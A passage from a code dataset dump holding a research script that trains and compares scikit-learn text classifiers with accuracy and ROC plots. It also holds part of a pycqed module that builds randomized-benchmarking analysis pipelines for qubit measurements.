text_name)\n\n","sub_path":"text_statistics.py","file_name":"text_statistics.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"480083347","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 28 14:24:33 2019\r\n\r\n@author: mxc18bsu\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction import text \r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.dummy import DummyClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\nimport scipy.stats as stats\r\nfrom sklearn import metrics\r\nfrom sklearn.linear_model import Perceptron\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nmy_additional_stop_words = [\"allow\",\"allowed\",\"dismiss\",\"dismissed\"]\r\nstop_words = text.ENGLISH_STOP_WORDS.union(my_additional_stop_words)\r\n\r\n\r\n\r\n\r\n####################### load in data\r\nos.chdir('U:\\Documents\\PyProjects\\dissertation\\\\texts')\r\ntotal1 = pd.read_pickle(\"Text_Documents_unbalanced_PP2\")\r\ntotal2 = total1.loc[total1['Label'].isin(['Against','For'])]\r\nX = total2['modText1'].values\r\ny = total2['Label'].values\r\nEncoder = LabelEncoder()\r\ny = Encoder.fit_transform(y)\r\n#list(Encoder.inverse_transform([0,1,2]))\r\n#remove 20% for validation set to be used for parameter tuning\r\n#remaining 80% to be used in CV\r\nX, X_val, y, y_val = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\n###scoring function\r\n\r\ndef scorer(classifier,features,y_input):\r\n kf = KFold(n_splits=5)\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='accuracy')\r\n print(sum(cv_scores)/len(cv_scores))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='f1_macro')\r\n print(\"f1_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='precision_macro')\r\n print(\"precision_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n cv_scores = cross_val_score(classifier, features, y_input, cv=kf,scoring='recall_macro')\r\n print(\"recall_macro: \"+str(sum(cv_scores)/len(cv_scores)))\r\n\r\n\r\n### Dummy classifier\r\n\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,6),\r\n min_df=1)\r\nfeatures_count = cv.fit_transform(X)\r\ndummy = DummyClassifier(strategy=\"uniform\")\r\nscorer(dummy,features_count,y)\r\n\r\n\r\n\r\n### classifiers\r\n\r\n#count features\r\ndef tfidfvector1():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n svclassifier = SVC(kernel='linear') \r\n \r\n scorer(svclassifier,features_count,y)\r\n \r\n\r\ndef tfidfvector2():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n rf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n \r\n scorer(rf,features_count,y)\r\n\r\n \r\ndef tfidfvector3():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n lr = LogisticRegression()\r\n \r\n scorer(lr,features_count,y)\r\n \r\n \r\ndef tfidfvector4():\r\n for i in [1,2,3,4]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=i)\r\n features_count = cv.fit_transform(X)\r\n \r\n knc = KNeighborsClassifier(n_neighbors=5)\r\n \r\n scorer(knc,features_count,y) \r\n\r\ndef tfidfvector5():\r\n #for i in [200,500,800,1000,2000,3000,4000,5000,6000,7000,8000,10000]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,4),\r\n min_df=3)\r\n features_count = cv.fit_transform(X)\r\n \r\n slp = Perceptron(tol=1e-3, random_state=0)\r\n \r\n scorer(slp,features_count,y) \r\n\r\ndef tfidfvector6():\r\n #for i in [1,2,3,4,5,6]:\r\n cv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,2),\r\n min_df=1)\r\n features_count = cv.fit_transform(X)\r\n \r\n mlp = MLPClassifier(solver='lbfgs',activation='relu', alpha=1e-5, hidden_layer_sizes=(2,2), random_state=1)\r\n \r\n scorer(mlp,features_count,y) \r\n\r\nprint(\"SVM\")\r\ntfidfvector1()\r\nprint(\"RF\")\r\ntfidfvector2()\r\nprint(\"LR\")\r\ntfidfvector3()\r\nprint(\"k-NN\")\r\ntfidfvector4()\r\nprint(\"slp\")\r\ntfidfvector5()\r\nprint(\"mlp\")\r\ntfidfvector6()\r\n\r\n\r\n\r\n\r\n############## model confidence plot\r\n\r\nX, X_test, y, y_test = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,4),\r\n min_df=1)\r\nfeatures_count = cv.fit_transform(X)\r\n\r\nrf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\nclassifier = rf.fit(features_count,y)\r\n\r\nX_predictions = cv.transform(X_test)\r\npredictions = classifier.predict_proba(X_predictions) \r\n\r\n#labels = ['Against', 'For', 'Split']\r\n\r\ny_test_l = []\r\ny_test_l = list(y_test)\r\n\r\ndataset = pd.DataFrame({'Label':y_test_l,'Label 0 (Against)':predictions[:,0],'Label 1 (for)':predictions[:,1]})\r\ndataset.sort_values(by=['Label'])\r\n\r\n\r\n\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.scatter(dataset['Label'],dataset['Label 0 (Against)'], color='g',label='Label 0 (against)',alpha=0.3)\r\nplt.scatter(dataset['Label'],dataset['Label 1 (for)'], color='r',label='label 1 (for)',alpha=0.3)\r\nplt.ylabel('Confidence')\r\nplt.xlabel('Accuracy')\r\nplt.title('Scatterplot of Confidence by Category')\r\nplt.legend(loc='lower right')\r\nplt.show()\r\nfig.savefig('model_confidence',dpi=300)\r\n\r\n\r\nplt.xticks(4, labels, size='small')\r\n\r\n\r\n\r\n\r\n#################################\r\n#statistical test for model confidence\r\ndataset0 = dataset[dataset['Label']==0]\r\ndataset1 = dataset[dataset['Label']==1]\r\ndataset2 = dataset[dataset['Label']==2]\r\n\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset0.iloc[:,1], dataset0.iloc[:,2], equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset0.iloc[:,1].mean()-dataset0.iloc[:,2].mean())\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset1.iloc[:,1], dataset1.iloc[:,2], equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset1.iloc[:,1].mean()-dataset1.iloc[:,2].mean())\r\n\r\nt_stat, p_val = stats.ttest_ind(dataset2.iloc[:,1], dataset2.iloc[:,2], equal_var=False)\r\nprint(t_stat,p_val)\r\nprint(dataset2.iloc[:,1].mean()-dataset2.iloc[:,2].mean())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n##################plot max_feature size accuracy by model\r\n#number of features results\r\nsvmlist = [0.5745954962468722,0.5618682235195998,0.5683069224353628,0.5719266055045872,0.5554545454545454,0.5628023352793995,0.558256880733945,0.5646455379482902,0.5692160133444537,0.5737781484570474,0.5765221017514596,0.5755879899916596]\r\nrflist = [0.6121100917431193,0.6039199332777315,0.6532944120100084,0.6450458715596331,0.6568890742285237,0.6569224353628023,0.6606005004170142,0.6742201834862386,0.6642201834862386,0.6861801501251042,0.688023352793995,0.709933277731443]\r\nlrlist = [0.5883319432860717,0.5682902418682236,0.5700834028356965,0.5792243536280234,0.5746955796497082,0.5802001668056713,0.5756380316930776,0.5765721434528774,0.5820266889074228,0.588465387823186,0.5929941618015013,0.5865721434528774]\r\nknclist = [0.5252210175145955,0.5262218515429524,0.5160550458715597,0.5315763135946623,0.5480900750625521,0.5480316930775647,0.5435029190992494,0.5480567139282736,0.5407673060884071,0.5444286905754796,0.5288490408673895,0.5562885738115096]\r\nslp = [0.5361861982299938,0.5647629742520254,0.5339696799550815,0.5200903719151895,0.534001764658699,0.54870190636614,0.5325472580947033,0.5325472580947034,0.547159166867196,0.5610866019625144,0.5398385069917917,0.5574235982995107]\r\nmlp = [0.45572310900778057,0.45572310900778057,0.5435202267319056,0.5340178070105077,0.5376647683217026,0.45572310900778057,0.5596214004973129,0.5325285420175931,0.45572310900778057,0.5479131574022085,0.45572310900778057,0.5632630143579049]\r\n#ngram results\r\nsvmlist = [0.5562135112593828,0.5644370308590492,0.5854795663052543,0.5918849040867389,0.5909591326105088,0.5918598832360301]\r\nrflist = [0.6019849874895746,0.6330859049207673,0.6458632193494578,0.6787739783152628,0.6604503753127606,0.665095913261051]\r\nlrlist = [0.5653294412010009,0.5699165971643035,0.5808924103419516,0.5790575479566304,0.5827272727272728,0.5809090909090908]\r\nknclist = [0.5204503753127606,0.5323603002502085,0.5205838198498749,0.5314595496246872,0.5360967472894079,0.532418682235196]\r\nslp = [0.5479211785781128,0.5164701478570092,0.5178818748161814,0.5413277719847063,0.5501216545012165,0.5493409267131895]\r\nmlp = [0.542060372717307,0.5728001925082217,0.46667201411726955,0.5640089837170128,0.45572310900778057,0.55633347897441]\r\n\r\n#min occurences results\r\nsvmlist = [0.5854795663052543,0.5790408673894912,0.5699082568807341,0.5717347789824854]\r\nrflist = [0.6111592994161802,0.6486321934945789,0.6458632193494578,0.6687823185988323]\r\nlrlist = [0.5808924103419516,0.5781484570475396,0.577256046705588,0.5735863219349457]\r\nknclist = [0.5205838198498749,0.5342118432026689,0.5387989991659716,0.535187656380317]\r\nslp = [0.5178818748161814,0.5201010668163952,0.5537846581642202,0.5427902997246064]\r\nmlp = [0.5640089837170128,0.45572310900778057,0.5559610705596107,0.45572310900778057]\r\n\r\n#### \r\nx=[200,500,800,1000,2000,3000,4000,5000,6000,7000,8000,10000]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy')\r\nplt.xlabel('Maximum Model Features')\r\nplt.title('Plot of model accuracy against maximum number of features')\r\nplt.legend(loc='upper right')\r\nplt.show()\r\nfig.savefig('accuracy_features',dpi=300)\r\n\r\nx=[1,2,3,4,5,6]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy %')\r\nplt.xlabel('Maximum n')\r\nplt.title('Plot of model accuracy against maximum n-gram value')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\nfig.savefig('accuracy_n',dpi=300)\r\n\r\nx=[1,2,3,4]\r\nfig = plt.figure(figsize=(10, 5))\r\nplt.plot(x,rflist, color='plum',label='Random Forest',linewidth=3)\r\nplt.plot(x,svmlist, color='aqua',label='SVM',linewidth=3)\r\nplt.plot(x,lrlist, color='royalblue',label='Logistic Regression',linewidth=3)\r\nplt.plot(x,knclist, color='darkturquoise',label='k-NN',linewidth=3)\r\nplt.plot(x,slp, color='limegreen',label='SLP',linewidth=3)\r\nplt.plot(x,mlp, color='darkviolet',label='MLP',linewidth=3)\r\nplt.ylabel('Accuracy %')\r\nplt.xlabel('Minimum Occurence')\r\naxes= plt.axes()\r\naxes.set_xticks([1,2,3,4])\r\nplt.title('Plot of model accuracy against minimum number of feature occurrences')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\nfig.savefig('accuracy_occurences',dpi=300)\r\n\r\n\r\n##########roc curves\r\n# roc curve and auc\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\nimport sklearn.metrics as metrics\r\nfrom sklearn import svm, datasets\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import label_binarize\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom scipy import interp\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n\r\n\r\nX, X_test, y, y_test = train_test_split(X, y,stratify=y, test_size=0.2)\r\n\r\n####\r\ncv = TfidfVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nclf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(features_count, y)\r\npredictions = classifier.predict_proba(features_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_TFIDF, tpr_TFIDF, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_TFIDF = metrics.auc(fpr_TFIDF, tpr_TFIDF)\r\n####\r\ncv = CountVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nclf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(features_count, y)\r\npredictions = classifier.predict_proba(features_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_COUNT, tpr_COUNT, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_COUNT = metrics.auc(fpr_COUNT, tpr_COUNT)\r\n####\r\ncv = CountVectorizer(\r\n analyzer = \"word\", \r\n tokenizer = None, \r\n preprocessor = None, \r\n stop_words = stop_words, \r\n lowercase=True,\r\n ngram_range=(1,3),\r\n min_df=3)\r\nfeatures_count = cv.fit_transform(X)\r\nfeatures_test = cv.transform(X_test)\r\nno_topics = 35\r\nlda_count = LatentDirichletAllocation(n_components=no_topics, max_iter=5, \r\n learning_method='online', learning_offset=50.,\r\n random_state=0).fit_transform(features_count)\r\nlda_test = LatentDirichletAllocation(n_components=no_topics, max_iter=5, \r\n learning_method='online', learning_offset=50.,\r\n random_state=0).fit_transform(features_test)\r\n\r\nclf = RandomForestClassifier(n_estimators=100, max_depth=20,random_state=0)\r\n\r\nclassifier = clf.fit(lda_count, y)\r\npredictions = classifier.predict_proba(lda_test) \r\n\r\npreds = predictions[:,1]\r\nfpr_LDA, tpr_LDA, threshold = metrics.roc_curve(y_test, preds)\r\nroc_auc_LDA = metrics.auc(fpr_LDA, tpr_LDA)\r\n######\r\n\r\n\r\n\r\n#######\r\n\r\nfig = plt.figure()\r\n\r\nplt.subplot(2, 2, 1)\r\nplt.title('Count Vectors - RF')\r\nplt.plot(fpr_COUNT, tpr_COUNT, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_COUNT,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 2)\r\nplt.title('TFIDF Vectors - RF')\r\nplt.plot(fpr_TFIDF, tpr_TFIDF, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_TFIDF,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 3)\r\nplt.title('Clusters - RF')\r\nplt.plot(fpr_LDA, tpr_LDA, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_LDA,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\nplt.subplot(2, 2, 4)\r\nplt.title('Doc2Vec - LR')\r\nplt.plot(fpr_D2V, tpr_D2V, color='darkturquoise', label = 'AUC = %0.2f' % roc_auc_D2V,linewidth=3)\r\nplt.legend(loc = 'lower right')\r\nplt.plot([0, 1], [0, 1],'r--',color='black')\r\nplt.xlim([0, 1])\r\nplt.ylim([0, 1])\r\nplt.ylabel('True Positive Rate')\r\nplt.xlabel('False Positive Rate')\r\nplt.tight_layout()\r\n\r\n\r\nplt.show()\r\nfig.savefig('roc_1',dpi=300)\r\n\r\n\r\n\r\n\r\n####stats test\r\n\r\nfrom scipy.stats import spearmanr\r\nx = list(range(1,7))\r\nspearmanr(x, slp)\r\nspearmanr(x, mlp)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"models_ml_ngrams.py","file_name":"models_ml_ngrams.py","file_ext":"py","file_size_in_byte":18814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"344969296","text":"import logging\nlog = logging.getLogger(__name__)\n\nimport lmfit\nimport numpy as np\nfrom scipy import optimize\nfrom collections import OrderedDict\nfrom pycqed.analysis import fitting_models as fit_mods\nfrom pycqed.analysis_v3 import fitting as fit_mod\nfrom pycqed.analysis_v3 import plotting as plot_mod\nfrom pycqed.analysis_v3 import helper_functions as hlp_mod\nfrom pycqed.analysis_v3 import processing_pipeline as pp_mod\nfrom pycqed.measurement import sweep_points as sp_mod\nfrom pycqed.measurement.calibration import calibration_points as cp_mod\nfrom copy import deepcopy\n\nimport sys\npp_mod.search_modules.add(sys.modules[__name__])\n\n# Create pipelines\n\n\ndef pipeline_single_qubit_rb_ssro(meas_obj_names, mospm, sweep_points,\n n_shots, dim_hilbert, cal_points=None,\n ro_thresholds=None, nreps=1,\n plot_all_shots=False, sweep_type=None,\n processing_pipeline=None):\n\n \"\"\"\n Wrapper to create the standard processing pipeline for an single qubit RB\n measurement, measured in SSRO.\n WARNING: if you use plot_all_shots=True, disable data saving. It will try\n to save a huge string of the large numpy array this node will generate.\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param n_shots: number of shots\n :param dim_hilbert: dimension of Hilebert space. 4 for 2QB RB, 2 for 1QB RB\n :param cal_points: CalibrationPoints object\n :param ro_thresholds: optional (the threshold_data node can also extract\n them from the data_dict. See docstring there).\n Dict with meas_obj_names as keys and their readout thresholds as values.\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param plot_all_shots: bool specifying whether to produce a raw plot of\n of all the shots vs cliffords. SEE WARNING ABOVE.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimensino (1), or the other\n way around.\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n sweep_points = sp_mod.SweepPoints(sweep_points)\n if cal_points is None:\n num_cal_states = 0\n else:\n if isinstance(cal_points, str):\n cal_points = cp_mod.CalibrationPoints.from_string(cal_points)\n num_cal_states = len(cal_points.states)\n if slow_cliffords:\n # n_segments = nr_seeds + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['seeds']) +\n num_cal_states)\n # n_sequences = nr_cliffords\n n_sequences = sweep_points.length(sweep_type['cliffords'])\n else:\n # n_segments = nr_cliffords + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['cliffords']) +\n num_cal_states)\n # n_sequences = nr_seeds\n n_sequences = sweep_points.length(sweep_type['seeds'])\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n n_shots=n_shots,\n meas_obj_names=meas_obj_names)\n keys_in = 'previous combine_datafiles_split_by_seeds' if nreps > 1 else 'raw'\n processing_pipeline.add_node('threshold_data',\n keys_in=keys_in,\n ro_thresholds=ro_thresholds,\n meas_obj_names=meas_obj_names)\n processing_pipeline.add_node('average_data',\n # shape=(n_shots, n_segments*n_sequences),\n # averaging_axis=0,\n shape=(n_sequences, n_shots, n_segments),\n averaging_axis=1,\n keys_in='previous threshold_data',\n meas_obj_names=meas_obj_names)\n for label in ['rb']:\n pp = pp_mod.ProcessingPipeline(keys_out_container=label)\n pp.add_node('average_data',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(n_sequences, n_segments) ,\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in='previous average_data',\n meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n sweep_type=sweep_type,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data='previous average_data',\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn][\n sweep_type['cliffords']])\n if plot_all_shots:\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][sweep_type['cliffords']],\n xvals=np.repeat(cliffords, n_segments*n_shots\n if slow_cliffords else n_sequences*n_shots),\n do_plotting=False,\n figname_suffix=f'shots_{label}',\n title_suffix=' - All shots',\n plot_params={'linestyle': 'none'},\n keys_in=keys_in,\n keys_out=None,\n meas_obj_names=mobjn)\n if slow_cliffords:\n xvals = np.repeat(cliffords, n_segments)\n else:\n xvals = np.tile(cliffords, n_sequences)\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][sweep_type['cliffords']],\n xvals=xvals,\n do_plotting=False,\n figname_suffix=f'{label}',\n title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, $P(|e\\\\rangle)$',\n yunit='',\n keys_in='previous average_data',\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n # do plotting of all plot_dicts in the data_dict\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\ndef pipeline_interleaved_rb_irb_classif(meas_obj_names, mospm, sweep_points,\n dim_hilbert, cal_points=None, nreps=1,\n sweep_type=None,\n processing_pipeline=None):\n \"\"\"\n Wrapper to create the standard processing pipeline for an interleaved RB/RIB\n measurement, measured with a the classifier detector with qutrit readout\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param dim_hilbert: dimension of Hilebert space. 4 for 2QB RB, 2 for 1QB RB\n :param cal_points: CalibrationPoints object\n :param nreps: int specifying the number of files to combine into one\n measurement. IMPORTANT! This feature only works if the measurement was\n split by seeds, not by cliffords. Meaning that each measurement file\n contains data for all the Cliffords in sweep_points, but for a subset\n of the total seeds.\n :param sweep_type: dict of the form\n {'cliffords': sweep_dim, 'seeds': sweep_dim} where sweep_dim is either\n 0 or 1 and specifies whether the measurement was run with seeds in the\n fast dimension (0) and cliffords in the slow dimensino (1), or the other\n way around.\n :param processing_pipeline: ProcessingPipeline instance to which this\n function will append.\n :return: the unresolved ProcessingPipeline\n \"\"\"\n if sweep_type is None:\n sweep_type = {'cliffords': 0, 'seeds': 1}\n slow_cliffords = sweep_type['cliffords'] == 1\n\n sweep_points = sp_mod.SweepPoints(sweep_points)\n if cal_points is None:\n num_cal_states = 0\n else:\n if isinstance(cal_points, str):\n cal_points = cp_mod.CalibrationPoints.from_string(cal_points)\n num_cal_states = len(cal_points.states)\n\n if slow_cliffords:\n # n_segments = nr_seeds + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['seeds'])\n + num_cal_states)\n # n_sequences = nr_cliffords\n n_sequences = sweep_points.length(sweep_type['cliffords'])\n else:\n # n_segments = nr_cliffords + nr_cal_segments\n n_segments = nreps*(sweep_points.length(sweep_type['cliffords'])\n + num_cal_states)\n # n_sequences = nr_seeds\n n_sequences = sweep_points.length(sweep_type['seeds'])\n\n if processing_pipeline is None:\n processing_pipeline = pp_mod.ProcessingPipeline()\n if nreps > 1:\n processing_pipeline.add_node('combine_datafiles_split_by_seeds',\n keys_in='raw',\n interleaved_irb=True,\n sweep_type=sweep_type,\n meas_obj_names=meas_obj_names)\n for label in ['rb', 'irb']:\n pp = pp_mod.ProcessingPipeline(global_keys_out_container=label)\n keys_in = 'previous combine_datafiles_split_by_seeds' if \\\n nreps > 1 else 'raw'\n pp.add_node('submsmt_data_from_interleaved_msmt', msmt_name=label,\n keys_in=keys_in, meas_obj_names=meas_obj_names)\n pp.add_node('average_data',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n meas_obj_names=meas_obj_names)\n pp.add_node('get_std_deviation',\n shape=(n_sequences, n_segments),\n averaging_axis=-1 if slow_cliffords else 0,\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n meas_obj_names=meas_obj_names)\n pp.add_node('rb_analysis',\n d=dim_hilbert,\n keys_in=f'previous {label}.average_data',\n keys_in_std=f'previous {label}.get_std_deviation',\n keys_in_all_seeds_data=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n do_plotting=False,\n keys_out=None,\n meas_obj_names=meas_obj_names)\n for mobjn in meas_obj_names:\n cliffords = sweep_points.get_sweep_params_property(\n 'values', sweep_type['cliffords'], mospm[mobjn][\n sweep_type['cliffords']])\n pp.add_node('prepare_1d_raw_data_plot_dicts',\n sp_name=mospm[mobjn][-1],\n xvals=np.repeat(cliffords, n_segments),\n do_plotting=False,\n figname_suffix=f'{label}',\n title_suffix=' - All seeds',\n plot_params={'linestyle': 'none'},\n ylabel='Probability, $P(|ee\\\\rangle)$' if\n mobjn=='correlation_object' else None,\n yunit='',\n keys_in=f'previous {label}.submsmt_'\n f'data_from_interleaved_msmt',\n keys_out=None,\n meas_obj_names=mobjn)\n processing_pipeline += pp\n\n # calculate interleaved gate error\n processing_pipeline.add_node('irb_gate_error',\n meas_obj_names='correlation_object',\n d=dim_hilbert)\n\n # do plotting of all plot_dicts in the data_dict\n processing_pipeline.add_node('plot')\n\n return processing_pipeline\n\n\ndef pipeline_ssro_measurement(meas_obj_names, mospm, sweep_points, n_shots,\n dim_hilbert, ro_thresholds=None,\n nreps=1, interleaved_irb=False, sweep_type=None,\n plot_all_shots=False, processing_pipeline=None,\n compression_factor=1, **params):\n\n \"\"\"\n Wrapper to create the standard processing pipeline for an interleaved RB/RIB\n measurement, measured in SSRO.\n WARNING: if you use plot_all_shots=True, disable data saving. It will try\n to save a huge string of the large numpy array this node will generate.\n :param meas_obj_names: list of measured object names\n :param mospm: meas_obj_sweep_points_map\n :param sweep_points: SweepPoints object (of one file if the measurement\n was split into several files)\n :param n_shots: number of shots\n :param dim_hilbert: dimension of Hilebert space. 